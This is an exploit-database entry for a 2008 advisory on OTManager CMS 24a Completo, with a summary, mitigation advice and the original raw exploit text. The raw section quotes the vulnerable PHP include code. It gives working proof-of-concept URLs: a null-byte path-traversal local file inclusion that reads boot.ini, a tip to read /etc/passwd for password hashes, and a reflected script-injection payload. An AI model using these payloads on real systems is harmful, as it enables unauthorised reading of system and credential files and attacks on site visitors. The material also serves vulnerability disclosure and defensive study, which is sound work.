OTManager CMS (LFI/XSS) Multiple Remote Vulnerabilities

vendor:

OTManager CMS

by:

CWH Underground

7.5

CVSS

HIGH

LFI/XSS

CWE

Product Name: OTManager CMS

Affected Version From: 24a Completo

Affected Version To: 24a Completo

Patch Exists: YES

Related CWE: N/A

CPE: a:otmanager:otmanager_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2008

OTManager CMS (LFI/XSS) Multiple Remote Vulnerabilities

A vulnerability exists in OTManager CMS version 24a Completo, which allows an attacker to perform a Local File Inclusion (LFI) and Cross-Site Scripting (XSS) attack. The vulnerability is due to the application not properly sanitizing user-supplied input to the 'conteudo' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow an attacker to execute arbitrary code on the server, steal sensitive information, or perform other malicious actions.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to access local files or execute arbitrary code. Additionally, the application should be updated to the latest version.

Source

Exploit-DB raw data:

===========================================================
  OTManager CMS (LFI/XSS) Multiple Remote Vulnerabilities
===========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 27 June 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : OTManager CMS
 VERSION     : 24a Completo
 VENDOR      : http://www.otmanager.org/
 DOWNLOAD    : http://downloads.sourceforge.net/otm/OTManager_v24a_Completo.zip
#####################################################

---------------------------------------
 Vulnerable File [index.php?conteudo=]
---------------------------------------

@Line

   76:  if($_REQUEST['conteudo']==""){
   77:  require("Principal.php");
   78:  }else{
   79:  if(!file_exists($_REQUEST['conteudo'].".php")){
   80:  echo '<center><font size="3"><b>404 URL Invalida</b></font><br><br>Por Favor, Selecione o Conteudo no Menu ao Lado.</center>';
   81:  }else{
   82:       require($_REQUEST['conteudo'].".php");
   83:       }
   84:  }


---------
 Exploit
---------

#####
 LFI
#####

[+] http://[Target]/[otmanager_path]/index.php?conteudo=[LFI]

   
    This exploit will open boot.ini in system file:

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

    You can change boot.ini to /etc/passwd%00 in linux OS, For view pass hash.

#####
 XSS
#####

[+] http://[Target]/[otmanager_path]/index.php?conteudo=[XSS]


-------------
 POC Exploit
-------------

#####
 LFI
#####

[+] http://192.168.24.25/otmanager/index.php?conteudo=../../../../../../../../boot.ini%00

#####
 XSS
#####

[+] http://192.168.24.25/otmanager/index.php?conteudo=</title><script>alert('XSS test');</script>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-27]